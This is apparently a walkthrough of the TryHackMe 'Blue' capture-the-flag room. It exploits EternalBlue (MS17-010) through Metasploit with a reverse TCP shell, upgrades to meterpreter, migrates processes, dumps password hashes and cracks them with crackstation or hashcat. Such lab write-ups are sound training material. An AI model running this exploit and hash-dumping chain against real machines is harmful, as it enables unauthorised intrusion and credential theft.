Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment.
1.1 Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room
Type in the command:
nmap -T4 -p- MACHINE_IP
1.2 How many ports are open with a port number under 1000?
1.3 What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
Just google Ethernal blue and you will find the answer
2.1 Start Metasploit by typing in the terminal
2.2 Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
Type in the msfconsole
2.3 Show options and set the one required value. What is the name of this value? (All caps for submission)
You need to select it first then use the options
use 2 Options set RHOSTS MACHINE_IP
2.4 Run the exploit
Run the following command
set payload windows/x64/shell/reverse_tcp
and we need to set the LHOST to tun0 by typing in. This means we using the IP of the tunnel. So the IP tryhackme is giving us, If you are not on vpn then use your IP from the attackbox
Set LHOST tun0
Now type run or exploit
Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
Now that we have a shell press CTRL +Z to push it to the background or type in background inside the shell
3.1 If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
i have found this website that might help How to Upgrade Command Shell to Meterpreter (hackingarticles.in)
3.2 Select this (use MODULE_PATH). Show options, what option are we required to change?
Type in sessions 2 to interact with it
Type in getuid to see what user we are
To list all the running processes type in ps
You can now migrate to a choosen process by typing migrate PROCESS_ID
I have migrated with the spoolsv.exe
4.1 Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?
Because we migrated to the correct service we now have privileges to do the hashdump
Type in the command
4.2 Copy this password hash to a file and research how to crack it. What is the cracked password?
Copy the last bit of the hash between the 3rd : and the 4th : then go to crackstation.net and put in that hash to get the password. It is that simple. If you want to crack it yourself you can do this with hashcat and the rockyou dictionary
The answer is the password you found
5.1 Flag1? This flag can be found at the system root.
Use the shell we still have and and look at the file on c:\
once found type in type <nameoffile>
So I see we need to find more flag. No problem just search for it with the following command
dir /s /p
All locations of the flags are now revealed and you should no. Remeber to look inside the file type in the following command
I already did the exploit before with Metasploit on an HackTheBox machine called Blue. It is very good to get some skills with Metasploit and to start understand the basic. Overall it is a good room which you should not miss